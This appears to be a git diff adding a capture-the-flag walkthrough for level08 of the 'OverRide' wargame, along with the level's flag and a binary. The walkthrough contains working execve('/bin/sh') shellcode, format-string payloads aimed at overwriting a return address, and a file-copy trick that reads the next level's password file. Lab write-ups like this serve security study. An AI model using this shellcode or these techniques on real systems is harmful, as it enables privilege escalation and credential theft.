diff --git a/level08/flag b/level08/flag
new file mode 100644
index 0000000..7301e9e
--- /dev/null
+++ b/level08/flag
@@ -0,0 +1 @@
+fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
diff --git a/level08/walkthrough b/level08/walkthrough
new file mode 100644
index 0000000..06b88df
--- /dev/null
+++ b/level08/walkthrough
@@ -0,0 +1,44 @@
+load shellcode in env with nop slide
+
+level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin
+level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin)
+level08@OverRide:~$
+
+
+(gdb) p (char *)getenv("SHELLCODE")
+$1 = 0xffffffffffffe892
+
+need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest.
+
+Better version (file doesn't need to exist as log_wrapper is called before fopen)
+
+level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)")
+ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x
+level08@OverRide:~$ cat backups/.log
+LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858
+level08@OverRide:~$
+
+with env -i :
+Breakpoint 1, 0x0000000000400a5a in main ()
+(gdb) p (char *)getenv("SHELLCODE")
+$1 = 0xffffffffffffef79
+
+
+
+env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')")
+
+
+actually its way simpler T_T :
+
+level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/
+level08@OverRide:~$ cd /tmp
+level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass
+ERROR: Failed to open /home/users/level09/pass
+level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
+level08@OverRide:/tmp$ cat backups/
+home/ .log
+level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
+fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
+level08@OverRide:/tmp$ exit
+logout
+Connection to localhost closed.
diff --git a/level09/Ressources/level09 b/level09/Ressources/level09
new file mode 100755
index 0000000..57c0d8f
Binary files /dev/null and b/level09/Ressources/level09 differ